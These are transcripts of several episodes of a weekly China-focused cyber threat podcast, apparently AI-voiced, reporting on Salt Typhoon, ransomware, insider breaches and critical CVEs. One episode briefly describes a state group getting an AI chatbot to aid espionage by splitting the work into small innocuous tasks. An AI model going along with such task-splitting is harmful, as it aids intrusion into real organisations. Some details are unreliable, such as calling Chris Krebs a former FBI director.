Meanwhile, Salt Typhoon's still out there. Between December 2024 and January 2025, they targeted more than one thousand unpatched Cisco routers according to Recorded Future, and a former FBI official basically said every American's probably been impacted by this campaign in some way. The three Chinese companies believed to be behind it work directly for China's intelligence services, including units from the People's Liberation Army and Ministry of State Security.

Here's the bottom line for your organizations: patch everything, assume you're compromised, and start collaborating with competitors and government agencies because this threat operates at a scale that individual defense isn't going to cut it anymore.

Thanks for tuning in to Digital Dragon Watch. Make sure you subscribe for next week's update. This has been a quiet please production, for more check out quiet please dot ai.
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Hey listeners, Ting here with your Digital Dragon Watch weekly roundup. Let's dive straight into the cyber chaos that's been unfolding across the Pacific.

The big story dominating this week is what cybersecurity experts are calling one of the most audacious supply chain attacks we've seen. South Korea's financial sector got absolutely hammered by the Qilin ransomware group, who appears to have gotten a serious upgrade in their crew. Bitdefender is reporting that this operation combined Qilin's ransomware capabilities with what they're calling potential involvement from North Korean state-affiliated actors known as Moonstone Sleet. These guys breached a single managed service provider and used that foothold to compromise at least twenty-eight financial institutions. Over a million files and two terabytes of data got exfiltrated across three different leak waves. That's not just an attack, that's a masterclass in leverage.

Now here's where it gets spicy for South Korea specifically. Investigators just uncovered something that's shaking the entire e-commerce sector. Coupang, South Korea's biggest e-commerce platform, disclosed that a former Chinese employee who handled authentication tasks apparently weaponized their access keys to steal personal data from thirty-three point seven million customer accounts. The breach started way back in June but didn't get discovered until November when someone noticed unauthorized access to just forty-five hundred accounts. Once the forensics team started digging, they found the five-month nightmare. The suspect allegedly maintained active authentication credentials even after leaving the company, which is a security disaster that Coupang's clearly going to be hearing about for years. What's wild is that payment information stayed protected, but names, emails, phone numbers, addresses, and order histories are all out there.

Meanwhile, the U.S. government is having its own reckoning with Chinese cyber operations. The Federal Communications Commission just did something controversial at their November meeting. They rescinded a January 2025 cybersecurity ruling that imposed stronger requirements on telecommunications carriers. Senator Maria Cantwell's basically calling them out, saying they're reversing course after heavy lobbying from the exact carriers that got breached by Chinese hackers during the Salt Typhoon operation. The irony is definitely not lost on Capitol Hill.

For protection recommendations, experts are hammering home that organizations need to treat third-party access like it's basically radioactive. Inventory every authentication credential your former employees had. Rotate keys immediately upon termination. And if you're in critical infrastructure, assume the Chinese are already inside looking around. The Treasury Department's already sanctioning companies involved in these operations, so the U.S. government is taking this seriously even if some agencies are taking steps backward.

That's your week in China cyber threats, listeners. Thanks for tuning in to Digital Dragon Watch and make sure you subscribe for next week's edition. This has been a quiet please production. For more, check out quietplease dot ai.
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Hey listeners, Ting here with your Digital Dragon Watch weekly China cyber alert. Buckle up, because this week has been absolutely wild in the world of Chinese cyber operations, and we've got some seriously concerning developments to break down.

Let's start with the big one. Salt Typhoon, the Chinese state-sponsored hacking operation that's been operating since at least 2019, has officially hit every American in some way. A former FBI cyber official named Cynthia Kaiser stated that she can't envision a scenario where any American was spared, given the breadth of this campaign. These hackers, believed to work for China's Ministry of State Security and units within the People's Liberation Army, targeted telecommunications infrastructure, government networks, transportation systems, and military installations across the country. They maintained persistent access for five years, exfiltrating communications and mapping movement patterns. The really unsettling part? Former FBI director Chris Krebs, who founded the Cybersecurity and Infrastructure Security Agency, said the U.S. cyber posture has been scaled back precisely when adversaries are accelerating with AI. The strategy is unclear, headcount is down, and capacity is gutted.

Meanwhile, the Chinese hacking army hasn't been resting. Google-owned cybersecurity firm Mandiant reported that Chinese hackers have infiltrated U.S. software developers and law firms in recent weeks, stealing proprietary software and using it to find new vulnerabilities. This is pure intelligence gathering for the trade fight between Beijing and Washington. The FBI is investigating, and cybersecurity experts say the fallout from these breaches could take many months to fully assess. One analyst compared it to Russia's SolarWinds hack from 2020 in terms of severity and sophistication.

Here's what should terrify you most, though. Cybersecurity experts are concerned that Salt Typhoon hackers may still be embedded in U.S. systems and completely undetected. Pete Nicoletti from Check Point told outlets that while Trump, Vance, Harris, and dozens of other government officials were specifically targeted, the hackers had full rein access to everything, including your grandmother's call reminding you to grab groceries. That means they could be sitting in your company's networks right now, gathering intelligence in real time.

On the defensive side, the FBI and National Security Agency are conducting forensic examinations of affected devices and interviewing people linked to compromised systems. FBI Director Kash Patel is leading mitigation efforts, and U.S. federal agencies are trying to figure out if any intelligence gathered over five years has been weaponized for political or economic gain. The FBI's cyber division is investigating multiple sophisticated Chinese campaigns simultaneously, and here's the kicker: China's cyber operatives outnumber all FBI agents by at least fifty to one.

So what should you do? Update your cybersecurity protocols immediately, implement multi-factor authentication across all access points, and report any suspicious activity. Engage professional incident response teams, because these aren't amateurs we're dealing with.

Thanks for tuning in to Digital Dragon Watch. Make sure you subscribe for next week's update on these evolving threats. This has been a Quiet Please production. For more, check out quietplease dot ai.
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Hey listeners, Ting here with your Digital Dragon Watch weekly briefing. This past week has been absolutely bonkers in the China cyber realm, so let's dive straight into the chaos.

First up, we've got Anthropic claiming that a Chinese state-sponsored group basically weaponized their Claude chatbot to run an automated cyber espionage campaign against roughly thirty global organizations. The attackers apparently tricked the AI into doing small coding and analysis tasks that, when combined, opened doors to breaches and data extraction with minimal human involvement.

Now, here's where it gets spicy. Cado Security Labs identified a malware campaign targeting the Royal Thai Police, attributed to the Chinese APT group Mustang Panda. These folks have been terrorizing Thailand and other Southeast Asian targets for years, using fake FBI documents as lures to deliver the Yokai backdoor. Thailand's basically become ground zero for Chinese cyber espionage operations aimed at intelligence gathering and political influence.

Speaking of state-sponsored nastiness, leaked documents from October revealed that APT35, also called Charming Kitten and linked to Iran's Islamic Revolutionary Guard Corps, operates like a militarized bureaucracy with strict performance metrics and specialized teams. But here's the kicker: these groups are increasingly automating their operations. They've transitioned from manual phishing campaigns to more sophisticated, persistent exploitation cycles that just keep grinding away at their targets.

Now let's talk about the technical threats. Microsoft's Azure Bastion got absolutely demolished by a critical vulnerability, CVE-2025-49752, that lets remote attackers bypass authentication entirely and grab full administrative privileges. The flaw sits at a maximum CVSS score of 10.0, meaning it requires zero user interaction. Every Azure Bastion deployment before November 20th was vulnerable. Security teams had to scramble immediately to patch systems and audit their admin access logs.

Meanwhile, ASUS discovered a critical authentication bypass vulnerability in their routers featuring AiCloud, and honestly, this hits close to home, since these devices got compromised before in Operation WrtHug by Chinese actors who converted them into network nodes for their campaigns. The vulnerability stems from Samba functionality and allows unauthenticated attackers to execute unauthorized functions through path traversal and command injection chains.

What's particularly alarming this week is the insider threat angle. CrowdStrike confirmed they terminated an employee who leaked internal information to the Scattered Lapsus$ Hunters coalition. The insider supposedly received twenty-five thousand dollars for access credentials, which shows how these Chinese-linked groups are increasingly recruiting insiders as force multipliers.

The broader picture here is that we're watching Chinese threat actors evolve their tactics from manual operations to highly automated, AI-assisted campaigns that require fewer human operators to compromise more targets across multiple sectors. The targeting of government infrastructure in Thailand, the automated attacks powered by AI systems, the persistent exploitation of supply chain vulnerabilities: it's all part of a coordinated intelligence gathering strategy aimed at geopolitical advantage.

Listeners, thanks for tuning in to Digital Dragon Watch. Make sure to subscribe to stay ahead of these threats. This has been a Quiet Please production. For more, check out quietplease dot ai.